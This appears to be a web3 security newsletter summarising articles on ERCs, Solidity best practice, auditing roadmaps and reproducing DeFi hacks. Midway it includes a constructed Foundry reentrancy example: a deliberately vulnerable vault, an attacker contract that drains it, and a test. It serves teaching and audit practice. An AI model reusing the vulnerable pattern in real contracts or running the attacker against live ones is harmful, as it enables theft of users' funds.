So You Want to Write an ERC
By: jtriley.eth - Article Link
First off, a good question is: What is an ERC?
An Ethereum Request for Comment (ERC) is the application-level category of Ethereum Improvement Proposal (EIP): a formal standards document that specifies a contract interface or convention (the ERC-20 and ERC-721 token interfaces are the best-known examples) so that independently written contracts, wallets, and tooling can interoperate. The ERC process is how the Ethereum community discusses, designs, and settles on these standards.
Understanding the ERC process and the guiding thoughts behind everyone who is involved in the process is massively helpful not only for devs but for security researchers as well. These are the building blocks of the Ethereum blockchain so it's great to not only deeply understand the blocks themselves, but the processes surrounding them. I don't want to over-summarize the article because it involves a lot of good (and entertaining) information. Give it a read!
How Solidity Devs can Write Safer Code
By: 0xjuaan - Article Link
Safer code is always the goal, and 0xjuaan has laid out some great tips on how to get there. Most languages have guides laying out best practices, patterns, anti-patterns, etc., and the same goes for Solidity. Some developer shops are more opinionated than others, but most have arrived at the same conclusions about how to write secure Solidity reliably.
The article goes over things to be aware of when:
Using external libraries
Writing tests
Writing code
Essentially, the overall goals for the codebase are:
Don't skip integration tests. You need 100% coverage for your integration tests. Integration test coverage and unit test coverage should also line up: if the logic breaks in one but not the other, that's a signal there's more to look into before proceeding with development.
Reduce the overall amount of code without making it unreadable or hard to understand.
Deeply understand any external libraries being used. This isn't just a random library import in a backwater Python repo; you never know what extra functions an external library exposes unless you read it.
A little "gift" from nisedo was included at the end of the article:
Enhance Your Solidity Skills by Reproducing Attacks
By: chrisdior.eth - Link
Practice makes perfect -- everyone has heard this saying before, and it holds true for understanding vulnerabilities and programming (in any language). There are multiple "views" of a language, and practicing different things involving them can upskill you in a specific area of that language. Seeing a language such as Go from the perspective of a backend dev who works on microservices every day is very different from the view of an application security engineer who reviews Go code for security flaws every day. It's a bit like a difficulty chart from HackTheBox: some people have more experience in certain areas like security, while others might be amazing at a skill like gas optimization.
Chris's tweet does a great job walking you through how to upskill your Solidity programming by practicing attacks. Read his post to go more in-depth, but essentially you need to:
Gather info. Stay up to date on the latest DeFi hacks by being active on Twitter and Telegram.
Debug the transaction. Exploit transactions are public since they occur on-chain, so they're open for anyone to analyze.
Analyze the exploit. Same as before: it occurred on-chain, so walk through it call by call. If it's too advanced and you find yourself struggling, search around or wait for another security researcher to publish an analysis, then study both what they found and how they found it.
Reproduce. This is key and completes your "exercise". Write up any notes you have on it and include any interesting results in your own methodology.
I will also always encourage posting your notes and analysis, but this is not a requirement.
Coming Up: Hands On with a Ledger Nano S Plus
By: alp1n3.eth
Recently Ledger had a killer sale on Amazon ($67) and I hadn't gotten a hardware wallet yet, so I picked one up! I basically needed to, especially after taking BoringSecDAO's Security 101 course. If you have any amount of money or NFTs, you need to have a hardware wallet. Keep an eye out for a blog post going over my experience so far with setting up and using my Ledger.
The Best Way to Learn is to Do
By: Patrick Collins - Link
Patrick recently posted two tweets:
That's it. That's the deal. Now all you have to do is start! One of the above courses is paid, but don't feel like you "need" it, because you definitely don't. Even the course author himself (super cool guy, produces great content) has said that all of the information from his course is free and available on the internet, and that he just put it together all in one place in a specific format to aid people who wanted a specific delivery method with a guaranteed level of quality. I'll leave you with a quote on imposter syndrome:
Imposter syndrome is a thing in every field, especially when starting out. The most common thing you'll find all of the "experts" have done is grind. The best way to audit is to do audits. One thing I like to do is to take known vulnerable codebases and try to find the bugs. Then read the reports, find the bugs, then reproduce the bugs in foundry or try to write invariant tests with echidna / medusa to uncover them.
- Jeff Schroeder via Telegram
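The "Reproduce" step from Chris's list and Jeff's advice to reproduce bugs in Foundry are the same exercise. As an added example (this is not code from any of the linked posts or their authors), here is a constructed, self-contained reentrancy reproduction in Foundry: a deliberately vulnerable vault, an attacker contract that re-enters withdraw(), and a test that asserts the drain. The Vault and Attacker contracts, the amounts, and the test names are all made up for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol";

// Constructed vulnerable vault: the external call happens before the
// balance is zeroed, violating checks-effects-interactions.
contract Vault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Vulnerable on purpose: ETH is sent while balances[msg.sender]
    // is still non-zero, so a receive() hook can call back in.
    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0;
    }
}

// Constructed attacker: deposits once, then re-enters withdraw()
// from receive() for as long as the vault can still pay out.
contract Attacker {
    Vault public immutable vault;

    constructor(Vault _vault) {
        vault = _vault;
    }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    receive() external payable {
        // msg.value is our original deposit; keep pulling while the
        // vault still holds at least that much.
        if (address(vault).balance >= msg.value) {
            vault.withdraw();
        }
    }
}

// Foundry test that reproduces the drain and pins down the outcome.
contract ReentrancyReproTest is Test {
    Vault vault;
    Attacker attacker;
    address victim = makeAddr("victim");

    function setUp() public {
        vault = new Vault();
        attacker = new Attacker(vault);
        // Honest user funds the vault with 10 ether (constructed scenario).
        vm.deal(victim, 10 ether);
        vm.prank(victim);
        vault.deposit{value: 10 ether}();
    }

    function test_DrainViaReentrancy() public {
        assertEq(address(vault).balance, 10 ether);
        vm.deal(address(this), 1 ether);

        // Attacker deposits 1 ether and walks away with the whole vault.
        attacker.attack{value: 1 ether}();

        assertEq(address(vault).balance, 0, "vault should be drained");
        assertEq(address(attacker).balance, 11 ether, "attacker gets deposit + victim funds");
    }
}
```

Run it with `forge test -vvvv` to get the full call trace, which is the "debug the transaction" step in miniature: you can watch each nested withdraw() fire before the balance is cleared. For a real incident you would replace the constructed Vault with a mainnet fork at the block before the exploit (Foundry's vm.createSelectFork cheatcode) and replay the attacker's calls against the live contracts, keeping the same assert-the-drain structure.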
Required Reading - The Auditooor Grindset
By: Stephen Tong - Link
Published back in February of 2022, this is a little bit of an older article, but it is 100% still relevant and contains some great resources and actionable advice on how to break into web3 security. The TL;DR at the top of the article says:
It will only take 1-2 weeks to get up to speed if you're already an experienced security researcher
Do Damn Vulnerable DeFi
Study Solidity patterns and anti-patterns
Read some writeups
Read other people's audit reports
The body of the article has a ton of extra info on why to start auditing smart contracts, how to do it, overviews of the web3 community and smart contract ecosystem, and reporting. Give it a shot and see what you glean!
The Ultimate Web3 Security Researcher Roadmap
By: preslavxyz - Link
I know, I know, "another roadmap", but hear me out; more information never hurts. Just make sure as you're absorbing these that you don't get stuck in "tutorial hell" and that you keep track of where you're at. For example, there's no need to build 20 different CEXs from tutorials over and over again if you're trying to be a web3 security researcher. Build one, call it good, and move on to the next step of your own custom roadmap that you've created for yourself.
Preslavxyz was nice enough to create a roadmap based on his experiences and release it to the public, which is awesome! I will always encourage any and all public contributions to the community, as people are taking time out of their own days to create something for someone else, entirely for free. Not to mention this one is fresh off the press, and he's keeping it updated; as of writing this article, he had added updates as recently as 6 hours ago. It's really simplified, which is phenomenal, and he has added his own unique spin to some of the usual suggestions, so I'd definitely check it out and see if there are any handy resources you haven't run across before.
I've taken some of the suggestions from his roadmap and incorporated them into mine, which can be found here.